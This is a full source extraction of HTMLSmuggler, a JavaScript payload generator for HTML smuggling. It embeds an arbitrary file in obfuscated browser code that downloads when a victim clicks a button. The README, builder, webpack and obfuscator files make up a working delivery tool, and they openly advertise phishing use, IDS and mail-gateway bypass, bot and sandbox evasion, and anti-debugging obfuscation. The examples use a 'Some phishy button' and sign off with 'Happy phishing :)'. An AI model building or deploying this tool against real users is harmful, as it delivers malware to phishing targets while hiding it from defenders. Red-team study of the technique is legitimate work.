Repository: D00Movenok/HTMLSmuggler
Branch: main
Commit: 79f03dcad005
Files: 20
Total size: 20.4 KB
Directory structure:
gitextract_azg0zlky/
├── .babelrc.js
├── .browserslistrc
├── .eslintrc.js
├── .gitattributes
├── .gitignore
├── .prettier.js
├── LICENSE
├── README.md
├── builder.js
├── examples/
│ ├── html/
│ │ ├── index.html
│ │ └── payload.umd.js
│ └── vuejs/
│ ├── Main.vue
│ └── payload.esm.js
├── obfuscator.js
├── package.json
├── src/
│ ├── assets/
│ │ └── .gitkeep
│ ├── index.js
│ └── utils.js
├── test/
│ └── test_payload.txt
└── webpack.config.js
================================================
FILE CONTENTS
================================================
================================================
FILE: .babelrc.js
================================================
module.exports = {
presets: [
[
"@babel/preset-env",
{
useBuiltIns: "usage",
corejs: 3,
},
],
],
};
================================================
FILE: .browserslistrc
================================================
> 0.5%
last 2 versions
not dead
ie 10
================================================
FILE: .eslintrc.js
================================================
module.exports = {
env: {
browser: true,
es2021: true,
},
extends: ["airbnb-base", "prettier"],
plugins: ["simple-import-sort"],
overrides: [
{
env: {
node: true,
},
files: [".eslintrc.{js,cjs}"],
parserOptions: {
sourceType: "script",
},
},
],
parserOptions: {
ecmaVersion: "latest",
sourceType: "module",
},
rules: {
"import/prefer-default-export": "off",
"simple-import-sort/imports": "error",
"simple-import-sort/exports": "error",
},
ignorePatterns: ["examples/**/payload.*.js"],
globals: {
CONFIG_COMPRESS: true,
CONFIG_ANTIBOT: true,
CONFIG_DELAY: true,
},
};
================================================
FILE: .gitattributes
================================================
examples/**/payload.*.js filter=lfs diff=lfs merge=lfs -text
================================================
FILE: .gitignore
================================================
.DS_Store
node_modules/
dist/
# all payloads
src/assets/*
!src/assets/.gitkeep
*.log
================================================
FILE: .prettier.js
================================================
module.exports = {
printWidth: 80,
tabWidth: 2,
useTabs: false,
semi: true,
singleQuote: true,
quoteProps: "as-needed",
trailingComma: "all",
bracketSpacing: true,
bracketSameLine: false,
arrowParens: "always",
proseWrap: "preserve",
htmlWhitespaceSensitivity: "strict",
vueIndentScriptAndStyle: true,
endOfLine: "lf",
};
================================================
FILE: LICENSE
================================================
MIT License
Copyright (c) 2023 Georgii Gennadev
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
================================================
FILE: README.md
================================================
# HTMLSmuggler ✉️
[](https://opensource.org/licenses/MIT)
HTMLSmuggler - JS payload generator for IDS bypass and payload delivery via HTML smuggling.
## Description
The full explanation what is HTML Smuggling may be found [here](https://outflank.nl/blog/2018/08/14/html-smuggling-explained/).
The primary objective of HTML smuggling is to bypass network security controls, such as firewalls and intrusion detection systems, by disguising malicious payloads (e.g. executables/archives/etc.) within seemingly harmless HTML and JavaScript code. By exploiting the dynamic nature of web applications, attackers can deliver malicious content to a user's browser without triggering security alerts or being detected by traditional security mechanisms. Thanks to this technique, the download of a malicious file is not displayed in any way in modern IDS solutions.
The main goal of HTMLSmuggler tool is creating an independent javascript library with embedded malicious user-defined payload. This library may be integrated into your phishing sites/email html attachments/etc. to deliver embedded payload to the target user system (bypassing IDS and IPS system). An example of created javascript library may be found [here](examples/html/payload.umd.js).
## Features
* Built-in highly configurable JavaScript obfuscator that fully hides your payload makes it impossible to extract your payload from javascript manually.
* Powerful client-side bots and headless crawlers detection library that doesn't share your payloads with smart secure mail gateways and their friends.
* Delay before loading to avoid sandboxes that are in a hurry.
* May be used both as an independent JS library or embedded in JS frameworks such as React, Vue.js, etc.
* The simplicity of the template allows you to add extra data handlers/compressions/obfuscations.
* Support a lot of browsers (including old IE10).
## Installation
1. [Install yarn](https://classic.yarnpkg.com/lang/en/docs/install/) package manager.
2. Install dependencies:
```bash
yarn
```
3. Read help message.
```bash
yarn build -h
```
```text
Options:
-p, --payload <string> Path to payload file you want to smuggle
-n, --name <string> Name of file, that would be downloaded
-t, --type <string> Contet-Type of downlonaded file (default: "application/octet-stream")
-f, --function <string> Name of exported function (default: "download")
-c, --compress Enable payload compression (gzip)
-d, --delay <number> Delay before antibot and download in ms (default: 0)
-a, --antibot Enable bot detection and block them (recommended)
-h, --help display help for command
```
## Usage
### Preparation steps
1. **(Optional)** Modify [javascript-obfuscator options](https://github.com/javascript-obfuscator/javascript-obfuscator#javascript-obfuscator-options) in `obfuscator.js`, my preset is nice, but very slow.
2. Compile your javascript payload:
> ⚠️ AVOID USAGE OF PAYLOADS BIGGER THAN 3 MiB (see [FAQ](#faq))
```bash
yarn build -p /path/to/payload -n file.exe -t "application/octet-stream" -c -a -d 3000
```
3. Get your payload from `dist/payload.esm.js` or `dist/payload.umd.js`. After that, it may be inserted into your page and called with `download()` (or custom specified with `-f` flag) function.
> `payload.esm.js` is used in `import { download } from 'payload.esm';` imports (ECMAScript standart).
>
> `payload.umd.js` is used in html script SRC and `require('payload.umd');` imports (CommonJS, AMD and pure html).
### Pure HTML example
A full example may be found [here](examples/html/).
1. Do [preparation steps](#preparation-steps).
2. Import created script to html file (or insert it inline):
```html
<head>
<script src="payload.umd.js"></script>
</head>
```
3. Call `download()` function from body:
```html
<body>
<button onclick="download()">Some phishy button</button>
</body>
```
4. Happy phishing :)
### VueJS example
A full example may be found [here](examples/vuejs/).
1. Do [preparation steps](#preparation-steps).
2. Import created script to vue file:
```vue
<script>
import { download } from './payload.esm';
</script>
```
3. Call `download()` function:
```vue
<template>
<button @click="download()">Some phishy button</button>
</template>
```
4. Happy phishing :)
## FAQ
**Q**: I have an error `RangeError: Maximum call stack size exceeded`, how to solve it?
**A**: This [issue described here](https://github.com/javascript-obfuscator/javascript-obfuscator/issues/89). To fix it, try to disable `splitStrings` in `obfuscator.js` or make smaller payload (it's recommended to use up to 2 MB payloads because of this issue).
---
**Q**: Why does my payload build so long?
**A**: The bigger payload you use, the longer it takes to create a JS file. To decrease time of build, try to disable `splitStrings` in `obfuscator.js`. Below is a table with estimated build times using default `obfuscator.js`.
| Payload size | Build time |
| --- | --- |
| 525 KB | 53 s |
| 1.25 MB | 8 m |
| 3.59 MB | 25 m |
================================================
FILE: builder.js
================================================
/* eslint-disable no-console */
/* eslint-disable import/no-extraneous-dependencies */
const fs = require("fs");
const { program } = require("commander");
const webpack = require("webpack");
const fflate = require("fflate");
const webpackConfig = require("./webpack.config");
program
.requiredOption(
"-p, --payload <string>",
"Path to payload file you want to smuggle"
)
.requiredOption(
"-n, --name <string>",
"Name of file, that would be downloaded"
)
.option(
"-t, --type <string>",
"Contet-Type of downlonaded file",
"application/octet-stream"
)
.option("-f, --function <string>", "Name of exported function", "download")
.option("-c, --compress", "Enable payload compression (gzip)")
.option("-d, --delay <number>", "Delay before antibot and download (ms)", 0)
.option("-a, --antibot", "Enable bot detection and block them (recommended)");
program.parse();
console.log("Using payload:", program.opts().payload);
console.log("Using filename:", program.opts().name);
console.log("Using Content-Type:", program.opts().type);
console.log("Exported function:", program.opts().function);
console.log("Compression:", program.opts().compress);
console.log("Delay:", program.opts().delay, "ms");
console.log("Antibot:", program.opts().antibot);
const dst = "src/assets/payload.bin";
fs.readFile(program.opts().payload, { encoding: "latin1" }, (err, data) => {
if (err) throw err;
const aData = fflate.strToU8(data, true);
const payload = program.opts().compress
? fflate.compressSync(aData, { level: 9, mem: 12 })
: aData;
console.log("Payload size:", payload.length, "b");
fs.writeFile(dst, payload, { flag: "w+" }, (err2) => {
if (err2) throw err2;
const compiler = webpack(
webpackConfig({
filetype: program.opts().type,
filename: program.opts().name,
funcname: program.opts().function,
compress: program.opts().compress,
antibot: program.opts().antibot,
delay: program.opts().delay,
})
);
compiler.run((err3, stats) => {
if (err3) throw err3;
console.log(
stats.toString({
colors: true,
})
);
});
});
});
================================================
FILE: examples/html/index.html
================================================
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Some phishy site</title>
<script src="payload.umd.js"></script>
</head>
<body>
<button onclick="download()">Some phishy button</button>
</body>
</html>
================================================
FILE: examples/html/payload.umd.js
================================================
version https://git-lfs.github.com/spec/v1
oid sha256:5c9f1b9fc83c374a00fd63c9b353b37b1d587bb41e4064eb9a1aad1d87dbb7b8
size 1092062
================================================
FILE: examples/vuejs/Main.vue
================================================
<script>
import { download } from "./payload.esm";
</script>
<template>
<button @click="download()">Some phishy button</button>
</template>
================================================
FILE: examples/vuejs/payload.esm.js
================================================
version https://git-lfs.github.com/spec/v1
oid sha256:4168d1bf553806cec123e3a7370c595068f3167a7998438242edac2cfc7ae361
size 1098951
================================================
FILE: obfuscator.js
================================================
// Obfuscator doc:
// https://github.com/javascript-obfuscator/javascript-obfuscator#javascript-obfuscator-options
module.exports = {
compact: true,
controlFlowFlattening: true,
controlFlowFlatteningThreshold: 1,
deadCodeInjection: true,
deadCodeInjectionThreshold: 1,
// NOTE: disable debugProtection for testing in console
debugProtection: true,
debugProtectionInterval: 4000,
disableConsoleOutput: true,
// NOTE: add domains to work only specified domains
// e.g. example.com, sub.example.com
domainLock: [],
domainLockRedirectUrl: "about:blank",
forceTransformStrings: [],
identifierNamesCache: null,
identifierNamesGenerator: "mangled-shuffled",
identifiersDictionary: [],
identifiersPrefix: "",
ignoreImports: false,
inputFileName: "",
log: true,
numbersToExpressions: true,
renameGlobals: false,
renameProperties: true,
renamePropertiesMode: "safe",
// NOTE: dirty fix to make BotD work with obfuscator
reservedNames: ["sent", "trys"],
reservedStrings: [],
seed: 0,
selfDefending: true,
simplify: true,
sourceMap: false,
sourceMapBaseUrl: "",
sourceMapFileName: "",
sourceMapMode: "separate",
sourceMapSourcesMode: "sources-content",
// NOTE: disable splitStrings if "Maximum call stack size exceeded"
splitStrings: true,
splitStringsChunkLength: 35,
stringArray: true,
stringArrayCallsTransform: true,
stringArrayCallsTransformThreshold: 1,
stringArrayEncoding: ["base64", "rc4"],
stringArrayIndexesType: ["hexadecimal-number"],
stringArrayIndexShift: true,
stringArrayRotate: true,
stringArrayShuffle: true,
stringArrayWrappersCount: 6,
stringArrayWrappersChainedCalls: true,
stringArrayWrappersParametersMaxCount: 6,
stringArrayWrappersType: "function",
stringArrayThreshold: 1,
target: "browser",
transformObjectKeys: true,
unicodeEscapeSequence: false,
};
================================================
FILE: package.json
================================================
{
"name": "html-smuggler",
"version": "1.2.0",
"description": "Payload delivery using HTML smuggling",
"private": true,
"repository": {
"url": "https://github.com/D00Movenok/HTMLSmuggler",
"type": "git"
},
"author": "Georgii Gennadev <egor.gennadjev@yandex.ru>",
"license": "MIT",
"scripts": {
"build": "node builder.js",
"lint": "eslint . --ext .js --fix --ignore-path .gitignore"
},
"devDependencies": {
"@babel/core": "^7.23.9",
"@babel/preset-env": "^7.23.9",
"babel-loader": "^9.1.3",
"binary-loader": "^0.0.1",
"commander": "^11.0.0",
"eslint": "^8.46.0",
"eslint-config-airbnb-base": "^15.0.0",
"eslint-config-prettier": "^8.9.0",
"eslint-plugin-import": "^2.28.0",
"eslint-plugin-simple-import-sort": "^10.0.0",
"javascript-obfuscator": "^4.0.2",
"prettier": "^3.0.0",
"string-replace-loader": "^3.1.0",
"webpack": "^5.88.2",
"webpack-obfuscator": "^3.5.1"
},
"dependencies": {
"@fingerprintjs/botd": "^1.9.0",
"core-js": "3",
"fflate": "^0.8.0"
}
}
================================================
FILE: src/assets/.gitkeep
================================================
================================================
FILE: src/index.js
================================================
import { decompressSync, strToU8 } from "fflate";
import payload from "./assets/payload.bin";
import { download, isBot, sleep } from "./utils";
async function main() {
// sleep before execution
await sleep(CONFIG_DELAY);
// antibot
if (CONFIG_ANTIBOT) {
const ib = await isBot();
if (ib) {
console.log("Detected bot, exit");
return;
}
}
// data decompressing and downloading
console.log("Downloading data. Compressed:", CONFIG_COMPRESS);
let data = strToU8(payload, true);
data = CONFIG_COMPRESS ? decompressSync(data) : data;
download(data, "dont_change_filename_var", "dont_change_content_type_var");
}
export { main as dontChangeFunctionName };
================================================
FILE: src/utils.js
================================================
import { load } from "@fingerprintjs/botd";
function download(data, filename, type) {
const blob = new Blob([data], { type });
if (window.navigator.msSaveOrOpenBlob) {
window.navigator.msSaveOrOpenBlob(blob, filename);
} else {
const url = URL.createObjectURL(blob);
const a = document.createElement("a");
a.style = "display: none";
a.href = url;
a.download = filename;
document.body.appendChild(a);
a.click();
setTimeout(() => {
document.body.removeChild(a);
window.URL.revokeObjectURL(url);
}, 0);
}
}
function sleep(ms) {
return new Promise((resolve) => {
console.log("Sleeping:", ms, "ms");
setTimeout(resolve, ms);
});
}
async function isBot() {
let ib = false;
await load({
monitoring: false,
})
.then((botd) => botd.detect())
.then((result) => {
console.log("Antibot result:", result);
// dirty hack to bypass obfuscator renameProperties
ib = Object.values(result).some((val) => val === true);
})
.catch((error) => {
console.log("Antibot error:", error);
});
return ib;
}
export { download, isBot, sleep };
================================================
FILE: test/test_payload.txt
================================================
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Suspendisse ipsum sapien, pulvinar sed auctor et, ultricies rhoncus mi. Aenean eu lorem vitae massa imperdiet mattis sit amet vel lorem. Fusce eu tortor sem. Fusce dapibus volutpat enim, eget laoreet ex. Nullam nec vehicula mauris. Vestibulum vehicula sapien ut lacus varius varius. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras ultricies dictum sapien, nec tempor est lacinia in.
Morbi sed lobortis est. Donec sodales imperdiet nisl nec lacinia. Donec facilisis, eros ac pellentesque scelerisque, orci ante aliquam felis, vel consequat eros urna tincidunt nulla. Donec consequat tempor nibh vitae egestas. In consectetur nisl et consequat auctor. Phasellus scelerisque lectus in felis bibendum imperdiet. Donec sit amet magna nec nisi malesuada lacinia. Praesent finibus nulla in dui tristique dapibus. Aenean ultricies urna volutpat sem feugiat laoreet. Donec imperdiet tortor at massa ornare finibus. Donec sem odio, convallis ut vehicula interdum, consectetur quis metus.
Integer ut tempus sapien, in porttitor tortor. Etiam eget ligula magna. Sed luctus felis sed magna elementum tincidunt. In eleifend velit at massa iaculis, non tempor lacus iaculis. Ut rutrum tempus nunc, at ullamcorper sapien consequat porttitor. Mauris condimentum tempus consectetur. Donec at tortor nunc.
Morbi condimentum et justo in vestibulum. Donec consectetur nisl quis massa vulputate molestie. Etiam nec ultricies mi. Suspendisse potenti. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia curae; Sed suscipit et felis et malesuada. Nullam ut massa eros. Sed non faucibus lectus. Sed laoreet vel diam id tempor. Donec elementum libero non sodales tincidunt. Nullam maximus elit vel gravida consequat. Mauris eget neque lacinia, lacinia ipsum id, consectetur urna. Phasellus varius urna risus, et volutpat velit ultrices vitae. Interdum et malesuada fames ac ante ipsum primis in faucibus. Curabitur quam odio, hendrerit eu ornare vitae, fringilla vitae ligula.
Phasellus sodales consectetur nisl, eget mollis tellus hendrerit vitae. Quisque quis metus risus. In bibendum facilisis augue ac faucibus. Suspendisse ornare, ante a rutrum viverra, nisi tellus tempor elit, eget bibendum nibh elit non urna. Vivamus nisi nulla, lobortis ac faucibus a, commodo vel purus. Curabitur molestie risus eros, at aliquam mi rutrum id. Fusce non est rhoncus, iaculis quam sed, accumsan erat. Vestibulum eros elit, porttitor quis fringilla vel, volutpat nec dui. Sed nec urna aliquam, blandit sem vel, dapibus nulla. Aliquam commodo consectetur libero sed suscipit. Cras semper pellentesque lorem sed dignissim. Vestibulum lectus purus, mollis eu viverra in, placerat quis dui. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. In dolor felis, commodo sit amet felis sit amet, rhoncus pellentesque mauris
================================================
FILE: webpack.config.js
================================================
const path = require("path");
const webpack = require("webpack");
const WebpackObfuscator = require("webpack-obfuscator");
const obfuscatorOptions = require("./obfuscator");
module.exports = ({
filename,
filetype,
funcname,
compress,
antibot,
delay,
}) => {
const commonConfig = {
mode: "production",
performance: {
hints: false,
maxEntrypointSize: 512000,
maxAssetSize: 512000,
},
entry: "./src/index.js",
module: {
rules: [
// NOTE: Defines string names,
// used because webpack.DefinePlugin globals obfuscation issues.
{
test: /\.m?js$/,
exclude: /node_modules/,
use: {
loader: "string-replace-loader",
options: {
multiple: [
{ search: "dont_change_filename_var", replace: filename },
{ search: "dont_change_content_type_var", replace: filetype },
{ search: "dontChangeFunctionName", replace: funcname },
],
},
},
},
// NOTE: embed out payload to js
{
test: /assets\/.*/,
exclude: /node_modules/,
use: {
loader: "binary-loader",
},
},
// NOTE: support for older browsers
{
test: /\.m?js$/,
exclude: /node_modules/,
use: {
loader: "babel-loader",
},
},
// NOTE: heavy obfuscation
{
test: /.*/,
enforce: "post",
// NOTE: excluded core-js because it takes too long to obfuscate
exclude: /node_modules\/core-js/,
use: {
loader: WebpackObfuscator.loader,
options: obfuscatorOptions,
},
},
],
},
plugins: [
// NOTE: Defines boolean globals to change execution flow.
new webpack.DefinePlugin({
CONFIG_COMPRESS: JSON.stringify(compress),
CONFIG_ANTIBOT: JSON.stringify(antibot),
CONFIG_DELAY: JSON.stringify(delay),
}),
],
};
return [
{
output: {
path: path.resolve(__dirname, "dist"),
filename: "payload.umd.js",
libraryTarget: "umd",
},
...commonConfig,
},
{
output: {
path: path.resolve(__dirname, "dist"),
filename: "payload.esm.js",
libraryTarget: "module",
},
experiments: {
outputModule: true,
},
...commonConfig,
},
];
};
gitextract_azg0zlky/ ├── .babelrc.js ├── .browserslistrc ├── .eslintrc.js ├── .gitattributes ├── .gitignore ├── .prettier.js ├── LICENSE ├── README.md ├── builder.js ├── examples/ │ ├── html/ │ │ ├── index.html │ │ └── payload.umd.js │ └── vuejs/ │ ├── Main.vue │ └── payload.esm.js ├── obfuscator.js ├── package.json ├── src/ │ ├── assets/ │ │ └── .gitkeep │ ├── index.js │ └── utils.js ├── test/ │ └── test_payload.txt └── webpack.config.js
SYMBOL INDEX (4 symbols across 2 files)
FILE: src/index.js
function main (line 6) | async function main() {
FILE: src/utils.js
function download (line 3) | function download(data, filename, type) {
function sleep (line 22) | function sleep(ms) {
function isBot (line 29) | async function isBot() {
Condensed preview — 20 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (23K chars).
[
{
"path": ".babelrc.js",
"chars": 146,
"preview": "module.exports = {\n presets: [\n [\n \"@babel/preset-env\",\n {\n useBuiltIns: \"usage\",\n corejs: 3"
},
{
"path": ".browserslistrc",
"chars": 37,
"preview": "> 0.5%\nlast 2 versions\nnot dead\nie 10"
},
{
"path": ".eslintrc.js",
"chars": 687,
"preview": "module.exports = {\n env: {\n browser: true,\n es2021: true,\n },\n extends: [\"airbnb-base\", \"prettier\"],\n plugins:"
},
{
"path": ".gitattributes",
"chars": 61,
"preview": "examples/**/payload.*.js filter=lfs diff=lfs merge=lfs -text\n"
},
{
"path": ".gitignore",
"chars": 88,
"preview": ".DS_Store\n\nnode_modules/\ndist/\n\n# all payloads\nsrc/assets/*\n!src/assets/.gitkeep\n\n*.log\n"
},
{
"path": ".prettier.js",
"chars": 350,
"preview": "module.exports = {\n printWidth: 80,\n tabWidth: 2,\n useTabs: false,\n semi: true,\n singleQuote: true,\n quoteProps: \""
},
{
"path": "LICENSE",
"chars": 1073,
"preview": "MIT License\n\nCopyright (c) 2023 Georgii Gennadev\n\nPermission is hereby granted, free of charge, to any person obtaining "
},
{
"path": "README.md",
"chars": 5308,
"preview": "# HTMLSmuggler ✉️\n\n[](https://opensource.org/license"
},
{
"path": "builder.js",
"chars": 2205,
"preview": "/* eslint-disable no-console */\n/* eslint-disable import/no-extraneous-dependencies */\nconst fs = require(\"fs\");\nconst {"
},
{
"path": "examples/html/index.html",
"chars": 312,
"preview": "<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n <meta charset=\"UTF-8\">\n <meta name=\"viewport\" content=\"width=device-width"
},
{
"path": "examples/html/payload.umd.js",
"chars": 132,
"preview": "version https://git-lfs.github.com/spec/v1\noid sha256:5c9f1b9fc83c374a00fd63c9b353b37b1d587bb41e4064eb9a1aad1d87dbb7b8\ns"
},
{
"path": "examples/vuejs/Main.vue",
"chars": 143,
"preview": "<script>\nimport { download } from \"./payload.esm\";\n</script>\n\n<template>\n <button @click=\"download()\">Some phishy butto"
},
{
"path": "examples/vuejs/payload.esm.js",
"chars": 132,
"preview": "version https://git-lfs.github.com/spec/v1\noid sha256:4168d1bf553806cec123e3a7370c595068f3167a7998438242edac2cfc7ae361\ns"
},
{
"path": "obfuscator.js",
"chars": 1878,
"preview": "// Obfuscator doc:\n// https://github.com/javascript-obfuscator/javascript-obfuscator#javascript-obfuscator-options\nmodul"
},
{
"path": "package.json",
"chars": 1074,
"preview": "{\n \"name\": \"html-smuggler\",\n \"version\": \"1.2.0\",\n \"description\": \"Payload delivery using HTML smuggling\",\n \"private\""
},
{
"path": "src/assets/.gitkeep",
"chars": 0,
"preview": ""
},
{
"path": "src/index.js",
"chars": 697,
"preview": "import { decompressSync, strToU8 } from \"fflate\";\n\nimport payload from \"./assets/payload.bin\";\nimport { download, isBot,"
},
{
"path": "src/utils.js",
"chars": 1146,
"preview": "import { load } from \"@fingerprintjs/botd\";\n\nfunction download(data, filename, type) {\n const blob = new Blob([data], {"
},
{
"path": "test/test_payload.txt",
"chars": 2926,
"preview": "Lorem ipsum dolor sit amet, consectetur adipiscing elit. Suspendisse ipsum sapien, pulvinar sed auctor et, ultricies rho"
},
{
"path": "webpack.config.js",
"chars": 2515,
"preview": "const path = require(\"path\");\nconst webpack = require(\"webpack\");\nconst WebpackObfuscator = require(\"webpack-obfuscator\""
}
]
About this extraction
This page contains the full source code of the D00Movenok/HTMLSmuggler GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 20 files (20.4 KB), approximately 5.8k tokens, and a symbol index with 4 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.